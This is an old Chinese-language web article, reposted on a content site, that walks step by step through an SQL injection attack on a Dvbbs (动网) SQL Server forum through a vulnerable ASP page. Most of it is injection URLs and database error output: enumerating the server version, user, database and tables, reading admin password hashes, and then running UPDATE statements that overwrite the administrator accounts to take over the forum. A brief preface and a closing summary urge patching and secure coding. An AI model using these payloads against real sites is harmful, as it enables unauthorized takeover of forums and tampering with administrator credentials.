分享
 
 
 

再谈SQL注入入侵动网SQL版

王朝mssql·作者佚名  2006-01-09
窄屏简体版  字體: |||超大  

编辑前言:

这个文章我没有测试,但前提条件还是很多,比如一定要有别的程序存在,而且也要用同一个SQLSERVER库,还得假设有注入漏洞。说到底和动网没有什么关系,但因为动网论坛的开放性,让人熟悉了其数据库结构,和程序运作方法。在一步步的攻击中取得管理权限,再一步步的提升权限,如果正好数据库用的是SA帐号,就更是麻烦了。

正是由于这些条件的假设,所以大家也不用太紧张,这里提供的是很多理想状态下的入侵行为,在编程中减少安全漏洞是我们每个程序员要注意的。而站长在组合使用多个程序的时候,也要注意安全和程序的完整性。

在我所了解的多个动网7.0+sp2 的版本也有2-3次被黑现象,所以大家还要及时注意升级,详细进行权限设置。并不是说动网不好,而是说他程序的开放性,用的人很多,找出来的BUG会很多,软件学里说了,用的越多,BUG会越多。相对来说,我喜欢自己定制化开发的程序,相对来说会安全一些。

下面是六中男孩的正文

现在动网最新版本是7.0+SP2。应该说安全性已经是很高的了。所以从脚本本身的问题去突破它难度不小。但是我们可以从外部的一些途径间接“搞定”动网.现在IIS+ASP+SQL2000的组合是比较常见的。而一个网站运用大量的ASP脚本程序,难免不出纰漏。如果一台主机上存在某个SQL注入点,而这台主机又安装有动网SQL版的话,基本上可以得出结论:这个动网就是你的了。下面来看一下实例。

一、 首先确定目标。假设以下URL存在SQL注入:

程序代码:

[ 复制代码到剪贴板 ]

http://www.loveyou.com/type.asp?id=6 测试能否注入可以在6后面加个单引号。

http://www.loveyou.com/type.aspid=6' 返回错误提示:

Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14'

[

Microsoft][ODBC SQL Server Driver][SQL Server]字符串 '' 之前有未闭合的引号。

继续,先探测一下系统版本:

程序代码:

[ 复制代码到剪贴板 ]

http://www.loveyou.com/type.asp?id=(select @@version)--

返回:

Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07'

[

Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 '
Microsoft
SQL Server 2000 - 8.00.760 (
Intel
X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003
Microsoft
Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ' 转换为数据类型为 int 的列时发生语法错误。

看来已经打上最新的SP4补丁。

取得当前连接数据库用户:

程序代码:

[ 复制代码到剪贴板 ]

http://www.loveyou.com/type.asp?id=(select user_name())--

返回:

Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07'

[

Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 'webuser' 转换为数据类型为 int 的列时发生语法错误。

从错误信息中得到当前数据库用户为:webuser

取得当前连接数据库名:

程序代码:

[ 复制代码到剪贴板 ]

http://www.loveyou.com/type.asp?id=(select db_name())--

返回:

Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07'

[

Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 '01city' 转换为数据类型为 int 的列时发生语法错误。

从错误信息中得到当前数据库名为: 01city

接下来测试下权限:(注:因为我们的目的是搞定动网而不是侵占系统。所以数据库权限对我们不是很重要。)

程序代码:

[ 复制代码到剪贴板 ]

http://www.loveyou.com/type.asp?id=(SELECT IS_SRVROLEMEMBER('sysadmin'))--

返回错误信息。提示当前记录已删除。看来权限果然不是很高耶。继续,

http://www.loveyou.com/type.asp?id=(SE ... ('db_owner'))--

正常显示信息,看来连接数据库拥有的权限是DB_OWNER(DOWN数据库所有者。但对操纵数据是绰绰有余了。

二.得到数据库表名。不出意外的话动网的各个表就存在于当前数据库01city中。

首先得到第一个表:

程序代码:

[ 复制代码到剪贴板 ]

http://www.loveyou.com/type.asp?id=(select top 1 name from sysobjects where xtype='u' and status>0 and name not in(''))--

返回:[

Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 'address' 转换为数据类型为 int 的列时发生语法错误。

好的,第一个表名出来了,为: address

继续,

0 and name not in('address'))--" target=_blankhttp://www.loveyou.com/type.asp?id=(select top 1 name from sysobjects whe ... us>0 and name not in('address'))--

返回: admin 第二个表名也出来了。依次类推, 提交:

0 and name not in('address'" target=_blankhttp://www.loveyou.com/type.asp?id=(select top 1 name from sysobjects w ... tatus>0 and name not in('address','admin',...))--

可以得到当前数据库中所有表名。

不一会儿,结果出来了, 表名好眼熟啊。

"address","admin","bbslink","bbsnews","board","user".........傻瓜都看的出这是动网的表。当然还有其它的一些表,我们不去管它。

接下来就好办了,也不要去猜字段了,我们打开自己的动网数据库看一下就知道了。 既然有了表名,字段名,那么,动网不就在你掌握之下了吗? 但千万不要 drop table啊。 破坏就不好了。我们的目的是演练技术,提高水平。 好,那么,我们去得到动网的后台。

三、进入后台,取得动网论坛管理员权限。

程序代码:

[ 复制代码到剪贴板 ]

先看看后台有多少个管理员:

http://www.loveyou.com/type.asp?id=6 and 4 ... sername) from admin)--

返回错误: 当前的记录已被删除。说明管理员少于4位。直接提交,

http://www.loveyou.com/type.asp?id=6 and 1 ... sername) from admin)--

正常显示信息,看来管理员只有一个,读出管理员名字,

http://www.loveyou.com/type.asp?id=(sele ... from admin)--

出来了,管理员后台登陆名为: 01city

继续读出管理员后台登陆密码:

http://www.loveyou.com/type.asp?id=(sele ... from admin)--

很顺利,密码为: e7cc01be0e33a273

是MD5加密过的。难道要去破解它吗? 别急,根本不需要去破MD5密码。

由于动网后台管理是COOKIE+SESSION认证。所以只有管理员在前台登陆才可以进后台管理,一般用户是无法进后台管理的。即使后台用户和密码都知道的情况下也一样。所以我们还要取得前台管理的用户和密码。 这个很容易,在他论坛注册一个用户查看一下管理团队,得出,前台管理用户为: admin

好,得到他的密码:

程序代码:

[ 复制代码到剪贴板 ]

http://www.loveyou.com/type.asp?id=(select userpassword from user where username='admin')--

返回,admin的前台密码为:e7cc01be0e33a273

同样是MD5的。 现在利用COOKIE欺骗可以登陆它的前台管理了。但是还有别的办法吗?别忘了现在我们可是对它的数据库拥有生杀大权哦。聪明的你可能想到了,对 ,就是,update。 我们来提交:

http://www.loveyou.com/type.asp?id=6;update user set userpa ... 39; where username='admin';--

正常返回信息,应该成功执行了,查看一下:

http://www.loveyou.com/type.asp?id=(select userpassword&n ... here username='admin')--

返回值为: 49ba59abbe56e057

更改密码成功,说明一下,这个16位MD5是预先算好的。你要知道它的明文密码。

那么同样的,我们更改一下后台的管理密码.先把后台用户改成和前台用户一样的,提交:

http://www.loveyou.com/type.asp?id=6;update admin set ... sp;where username='01city'--

查看一下:

程序代码:

[ 复制代码到剪贴板 ]

http://www.loveyou.com/type.asp?id=(select username from admin)--

更改成功,后台管理员现在已变成:admin 接下来更改密码,提交:

http://www.loveyou.com/type.asp?id=6;update admin set passw ... ; where username='admin'--

查看一下:

程序代码:

[ 复制代码到剪贴板 ]

http://www.loveyou.com/type.asp?id=(select password from admin)--

更改成功,后台管理员密码已经变成:49ba59abbe56e057

到这里为止,动网已彻底沦陷。你可以用admin登陆前台然后再用相同的密码进后台管理了。

四、总结

就这样并不算太艰难的实现了对动网的控制。通过这次善意的渗透测试,也暴露出SQL INJECTION攻击的可怕性。而对于IIS+ASP+SQL2000的虚拟主机来说简直就是防不胜防。只要主机上有一个SQL注入点的话,动网就将面临灭顶之灾了。而其实从服务器庞大的网站程序中找一个这样的SQL注入点并不算难事.正应征了一句老话:千里之堤,溃于蚁穴。所以防范这样的攻击的最好办法是加强程序代码的安全性。安全是个整体,任何细微的错误都有可能导致严重后果。

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有